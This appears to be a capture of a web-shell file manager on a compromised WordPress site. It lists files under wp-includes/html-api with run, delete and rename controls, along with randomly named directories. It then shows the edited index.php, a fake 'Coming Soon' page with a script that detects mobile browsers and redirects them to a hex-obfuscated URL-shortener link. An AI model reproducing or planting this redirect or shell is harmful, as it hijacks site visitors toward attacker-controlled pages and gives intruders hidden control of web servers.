at path:
ROOT
/
wp-includes
/
html-api
/
index.php
run:
R
W
Run
1ozhjxe
DIR
2026-02-25 22:51:20
R
W
Run
cvehulm
DIR
2026-02-25 22:51:20
R
W
Run
rvqp1bl
DIR
2026-02-25 23:09:51
R
W
Run
syxbkle
DIR
2026-02-25 22:51:20
R
W
Run
class-wp-html-active-formatting-elements.php
14.98 KB
2024-11-13 19:02:13
R
W
Run
Delete
Rename
class-wp-html-attribute-token.php
10.6 KB
2023-12-10 13:19:28
R
W
Run
Delete
Rename
class-wp-html-decoder.php
24.19 KB
2024-11-13 19:02:13
R
W
Run
Delete
Rename
class-wp-html-doctype-info.php
32.68 KB
2025-12-03 06:22:56
R
W
Run
Delete
Rename
class-wp-html-open-elements.php
29.84 KB
2025-02-12 01:13:52
R
W
Run
Delete
Rename
class-wp-html-processor-state.php
18.96 KB
2025-04-16 02:33:33
R
W
Run
Delete
Rename
class-wp-html-processor.php
216.33 KB
2025-12-03 06:22:56
R
W
Run
Delete
Rename
class-wp-html-span.php
8.96 KB
2024-11-13 19:02:13
R
W
Run
Delete
Rename
class-wp-html-stack-event.php
9.49 KB
2024-11-13 19:02:13
R
W
Run
Delete
Rename
class-wp-html-tag-processor.php
155.47 KB
2026-02-04 01:01:35
R
W
Run
Delete
Rename
class-wp-html-text-replacement.php
9.26 KB
2024-11-13 19:02:13
R
W
Run
Delete
Rename
class-wp-html-token.php
11.22 KB
2024-11-13 19:02:13
R
W
Run
Delete
Rename
class-wp-html-unsupported-exception.php
11.41 KB
2024-11-13 19:02:13
R
W
Run
Delete
Rename
error_log
21.75 KB
2026-03-22 19:21:18
R
W
Run
Delete
Rename
html5-named-character-references.php
86.17 KB
2024-09-04 11:48:32
R
W
Run
Delete
Rename
index.htm
1.07 KB
2026-03-17 01:08:49
R
W
Run
Delete
Rename
index.html
1.07 KB
2026-03-17 01:08:49
R
W
Run
Delete
Rename
index.php
1.07 KB
2026-03-17 01:08:49
R
W
Run
Delete
Rename
error_log
up
📄
index.php
Save
<!DOCTYPE html> <html lang="ar"> <head> <meta charset="UTF-8"> <title>Coming Soon</title> <style> body { display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; background-color: #f0f6fc; font-family: Arial, sans-serif; text-align: center; color: #21759b; } h1 { font-size: 7em; margin: 0; } p { font-size: 1.5em; margin-top: 0.5em; } </style> </head> <body> <div> <h1>WordPress</h1> <p><b>Coming Soon</b></p> </div> <script> document.addEventListener("DOMContentLoaded", function() { if (/Mobi|Android|iPhone|iPad|iPod|IEMobile|Opera Mini/i.test(navigator.userAgent)) { window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x76\x48\x77\x48\x59\x43\x7a\x30\x72\x34"; } }); </script> </body> </html>